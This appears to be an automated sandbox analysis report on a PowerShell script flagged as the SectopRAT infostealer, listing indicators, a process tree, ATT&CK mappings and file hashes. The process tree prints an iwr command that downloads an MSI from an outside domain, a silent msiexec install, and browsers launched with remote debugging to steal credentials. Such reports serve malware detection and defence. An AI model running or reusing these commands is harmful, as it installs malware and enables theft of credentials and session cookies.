Analysis

max time kernel: 129s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/04/2025, 22:28
Static task: static1
General

Target: code.ps1
Size: 128B
MD5: d8fb7b85741db93be10e3ed1363e32e7
SHA1: 2b464dce118e15d86c14a3e967acea2ac333f9c3
SHA256: 673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048
SHA512: 9023651ed98a14a2b5c579f4a61270daa337548c93169963d65cf2d9d10f1e2560e8b32874fca357acabacd8554394f369c106b95cda4c3add539870da9638af
Malware Config
Signatures

SectopRAT payload 1 IoCs
resource | yara_rule
behavioral1/memory/5980-1449-0x0000000000400000-0x00000000004D4000-memory.dmp | family_sectoprat

Sectoprat family

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 3208 created 3468 | 3208 | CasPol.exe | 56

Blocklisted process makes network request 2 IoCs
flow | pid | Process
9 | 644 | powershell.exe
17 | 644 | powershell.exe

Uses browser remote debugging 2 TTPs 10 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
1680 | msedge.exe
644 | chrome.exe
408 | chrome.exe
4992 | chrome.exe
5376 | chrome.exe
3536 | msedge.exe
1416 | chrome.exe
3876 | chrome.exe
4372 | msedge.exe
1972 | msedge.exe

Executes dropped EXE 2 IoCs
pid | Process
2676 | vmnetdhcp.exe
5980 | CasPol.exe

Loads dropped DLL 5 IoCs
pid | Process
4544 | MsiExec.exe
4544 | MsiExec.exe
4544 | MsiExec.exe
4544 | MsiExec.exe
3208 | CasPol.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 2676 set thread context of 3208 | 2676 | vmnetdhcp.exe | 105
PID 2676 set thread context of 744 | 2676 | vmnetdhcp.exe | 107
PID 3208 set thread context of 5980 | 3208 | CasPol.exe | 111

Drops file in Windows directory 12 IoCs
description | ioc | Process
File created | C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBDB6.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBAE4.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBC2D.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBCDB.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\e57b971.msi | msiexec.exe
File created | C:\Windows\Installer\e57b96d.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e57b96d.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBC8B.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe

Command and Scripting Interpreter: PowerShell
pid | Process
3048 | powershell.exe
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | vmnetdhcp.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | gpupdate.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Enumerates system info in registry 2 TTPs 6 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (consecutive identical rows collapsed, count in parentheses)
3048 | powershell.exe (x2)
644 | powershell.exe (x2)
4952 | msiexec.exe (x2)
2676 | vmnetdhcp.exe (x6)
3208 | CasPol.exe (x4)
744 | gpupdate.exe (x3)
3208 | CasPol.exe (x2)
5980 | CasPol.exe (x7)
668 | taskmgr.exe (x26)
5980 | CasPol.exe (x5)
668 | taskmgr.exe (x2)
644 | chrome.exe (x2)
668 | taskmgr.exe (x1)
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process
2676 | vmnetdhcp.exe
2676 | vmnetdhcp.exe
2676 | vmnetdhcp.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid | Process (consecutive identical rows collapsed, count in parentheses)
644 | chrome.exe (x5)
3536 | msedge.exe (x3)

Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3048 | powershell.exe
Token: SeDebugPrivilege | 644 | powershell.exe
Token: SeShutdownPrivilege | 1452 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 1452 | msiexec.exe
Token: SeSecurityPrivilege | 4952 | msiexec.exe
Token: SeCreateTokenPrivilege | 1452 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 1452 | msiexec.exe
Token: SeLockMemoryPrivilege | 1452 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 1452 | msiexec.exe
Token: SeMachineAccountPrivilege | 1452 | msiexec.exe
Token: SeTcbPrivilege | 1452 | msiexec.exe
Token: SeSecurityPrivilege | 1452 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1452 | msiexec.exe
Token: SeLoadDriverPrivilege | 1452 | msiexec.exe
Token: SeSystemProfilePrivilege | 1452 | msiexec.exe
Token: SeSystemtimePrivilege | 1452 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 1452 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 1452 | msiexec.exe
Token: SeCreatePagefilePrivilege | 1452 | msiexec.exe
Token: SeCreatePermanentPrivilege | 1452 | msiexec.exe
Token: SeBackupPrivilege | 1452 | msiexec.exe
Token: SeRestorePrivilege | 1452 | msiexec.exe
Token: SeShutdownPrivilege | 1452 | msiexec.exe
Token: SeDebugPrivilege | 1452 | msiexec.exe
Token: SeAuditPrivilege | 1452 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 1452 | msiexec.exe
Token: SeChangeNotifyPrivilege | 1452 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 1452 | msiexec.exe
Token: SeUndockPrivilege | 1452 | msiexec.exe
Token: SeSyncAgentPrivilege | 1452 | msiexec.exe
Token: SeEnableDelegationPrivilege | 1452 | msiexec.exe
Token: SeManageVolumePrivilege | 1452 | msiexec.exe
Token: SeImpersonatePrivilege | 1452 | msiexec.exe
Token: SeCreateGlobalPrivilege | 1452 | msiexec.exe
Token: SeRestorePrivilege | 4952 | msiexec.exe (x15, alternating with the next row)
Token: SeTakeOwnershipPrivilege | 4952 | msiexec.exe (x15, alternating with the previous row)
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 668 taskmgr.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process (identical rows collapsed, count in parentheses)
668 | taskmgr.exe (x64)
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
5980 | CasPol.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (consecutive identical rows collapsed, count in parentheses)
PID 3048 wrote to memory of 644 | 3048 | powershell.exe | 86 (x2)
PID 3048 wrote to memory of 1452 | 3048 | powershell.exe | 99 (x2)
PID 4952 wrote to memory of 4544 | 4952 | msiexec.exe | 102 (x3)
PID 4952 wrote to memory of 2676 | 4952 | msiexec.exe | 103 (x3)
PID 2676 wrote to memory of 3208 | 2676 | vmnetdhcp.exe | 105 (x5)
PID 2676 wrote to memory of 744 | 2676 | vmnetdhcp.exe | 107 (x4)
PID 3208 wrote to memory of 5980 | 3208 | CasPol.exe | 111 (x8)
PID 5980 wrote to memory of 644 | 5980 | CasPol.exe | 128 (x2)
PID 644 wrote to memory of 556 | 644 | chrome.exe | 129 (x2)
PID 644 wrote to memory of 4544 | 644 | chrome.exe | 130 (x2)
PID 644 wrote to memory of 6124 | 644 | chrome.exe | 131 (x30)
PID 644 wrote to memory of 4728 | 644 | chrome.exe | 132 (x1)
Processes

- C:\Windows\Explorer.EXE (PID 3468)
  Command line: C:\Windows\Explorer.EXE

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3048)
    Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 644)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    - C:\Windows\system32\msiexec.exe (PID 1452)
      Command line: "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
      Signatures: Suspicious use of AdjustPrivilegeToken

  - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe (PID 5980)
    Command line: "C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"
    Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

    - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 644)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9878 --profile-directory="Default"
      Signatures: Uses browser remote debugging; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 556)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffca1e5dcf8,0x7ffca1e5dd04,0x7ffca1e5dd10

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4544)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2076,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2116 /prefetch:3

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6124)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2064,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2056 /prefetch:2

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4728)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2432,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:8

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3876)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3288,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3300 /prefetch:1
        Signatures: Uses browser remote debugging

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1416)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3324,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3336 /prefetch:1
        Signatures: Uses browser remote debugging

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4992)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4476,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4524 /prefetch:2
        Signatures: Uses browser remote debugging

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 408)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3896,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4504 /prefetch:2
        Signatures: Uses browser remote debugging

      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5376)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4304,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4924 /prefetch:1
        Signatures: Uses browser remote debugging

    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3536)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=8417 --profile-directory="Default"
      Signatures: Uses browser remote debugging; Enumerates system info in registry; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3696)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ffca1cdf208,0x7ffca1cdf214,0x7ffca1cdf220

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5392)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2720 /prefetch:3

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3532)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2688,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:2

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3064)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2008,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2900 /prefetch:8

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1972)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3580,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:1
        Signatures: Uses browser remote debugging

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4372)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3588,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:1
        Signatures: Uses browser remote debugging

      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1680)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4896,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:2
        Signatures: Uses browser remote debugging

  - C:\Windows\system32\taskmgr.exe (PID 668)
    Command line: "C:\Windows\system32\taskmgr.exe" /7
    Signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage

- C:\Windows\system32\msiexec.exe (PID 4952)
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures: Enumerates connected drives; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

  - C:\Windows\syswow64\MsiExec.exe (PID 4544)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 5D58F7367683250F38A619F767BB182E
    Signatures: Loads dropped DLL; System Location Discovery: System Language Discovery

  - C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe (PID 2676)
    Command line: "C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"
    Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory

    - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe (PID 3208)
      Command line: C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
      Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Loads dropped DLL; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\gpupdate.exe (PID 744)
      Command line: C:\Windows\SysWOW64\gpupdate.exe
      Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses

- C:\Windows\System32\rundll32.exe (PID 2376)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

- C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe (PID 1972)
  Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (PID 656)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
Network
MITRE ATT&CK Enterprise v15

Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (2)
  - Credentials In Files (2)
Downloads

Filesize: 11KB
MD5: d253412be7316e6d01bbf91fca2fc5fd
SHA1: 979b403133a85dba50e7dbd62cf1bad735613fd7
SHA256: 62da34622971298623cec69efa2966451c6b72f6d18a686b4a6daf8720994d23
SHA512: 72c948a3e3cd5e01959a45f814ff486b888e4d5d97bcb740dfc661dc8acef34eb558f5890da388e2c827095b99d162b221eff5dc2a8db0afffa3a960bfc0f1a7

Filesize: 2B
MD5: d751713988987e9331980363e24189ce
SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Filesize: 17KB
MD5: 18c8e608cb6d77b361af2f7831b3ef8f
SHA1: 2fde51c5b87400d9d084a296e7c814317cd98317
SHA256: 7293d8b7688fa078e531bbef966b1c3be5d8d8372137c902fb3f254fbbd476c0
SHA512: 73a0554132d4c5337e22356e3362d89c4a0f0f777f6b338db29e9b75127574c49e9a937efc83372c410c40d66a2560f9d497afced3a2b7bf37538fc68ad6a0d3

Filesize: 80KB
MD5: e36ec81524a93c45a2282b757e117ab0
SHA1: 4b0247e6e8cc62fb465b6b67c1bdf4d34334f8f9
SHA256: 4b436f5edfcc66ecc840f6f14427405e688f7c5d2ed637cc2ff91b3b1c3187c1
SHA512: b762876ddc8139c66d3d39995f49d98153c2e7fe88483669b294bded7cfa916e4d0b5f2735cd02de853972e77cfdf3f961cbb6d9b067a97882a17a1f428fc207

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 280B
MD5: 65044109d1beb8ed8d59560642cbc519
SHA1: 0084485b0aa26069232fab51ee603682e8edfd17
SHA256: a1e0b448218678b30356cbbe4092ea091435e7450822a9748361b6e8b198962d
SHA512: 96dcc68fe92f98c4329a8335cfffdb0849a52562431045ccc42076bda0abf3842491303fb669246bfd04e64113688d3f90000a09571dd76ff84b52e34e45f9b6

Filesize: 33KB
MD5: 819b8f9620fd7501d7f72ced5fa4c1c0
SHA1: a3aff5010fcd703a9907249d6e73be6fd9997586
SHA256: 3d4d7f76490781c3bd60a28cd6e1db070c2132e7b863a8aa0a675e71083894cf
SHA512: 107f113bdf0e70efdea516e45050d5294b0cb64dbd266944df5e4c648cafb36491d57d76a9fa3e17b687803dbee027ca334410b37ac8a7126c0b13ed2ac8573b

Filesize: 40KB
MD5: dc6b565397d89e73575175bbd9b8429d
SHA1: 590b17d6c9cbe2992954898987e8072259848362
SHA256: 392853a40fcbbaf154bda72e941cf48eee1764173ebba9b9f04d11158be732e7
SHA512: 3e921352e41ef75c46737a74b78765b5b8ce1ef53b9fc6be4387204b025b5ea9bdbfed07fe9ea1d0a3c533013950a23385d9cf84a1d9dc96afd7252cf67902c5

Filesize: 64B
MD5: 06aae955eb04310fe40698f5d7bf0100
SHA1: 16ec0684a8b66f0ff7368455c46cf7d70ae535b7
SHA256: a0f80c1fc0cc22007be466bdb14f1796deb11ac300a2666a4499d421cb1b8398
SHA512: baf164e644a6b0caecafe83b21daf1f1c1d26c296b9fbd0626fec777cf7ffd9525b4a04e331109e84ab6315d9b3798ced1fadb1bd5b6c2871afd968ab2c47f86

Filesize: 99KB
MD5: f61fa5ce25f885a9b1f549055c9911ed
SHA1: aba1c035b06017b0b0bd1c712669646e4f3765ab
SHA256: 57e9675902b443085e37ead57dfed97de6bb61321682bc93aff30f16b5ca5aeb
SHA512: 02e3db343037294fd3b774f954c9a617a50715e6b89d7c409f3c7dc5a1cf5ed9418158c442e9e80111994da139a9a16db33ac68a833d6d115c4a41bdf75751ac

Filesize: 2.9MB
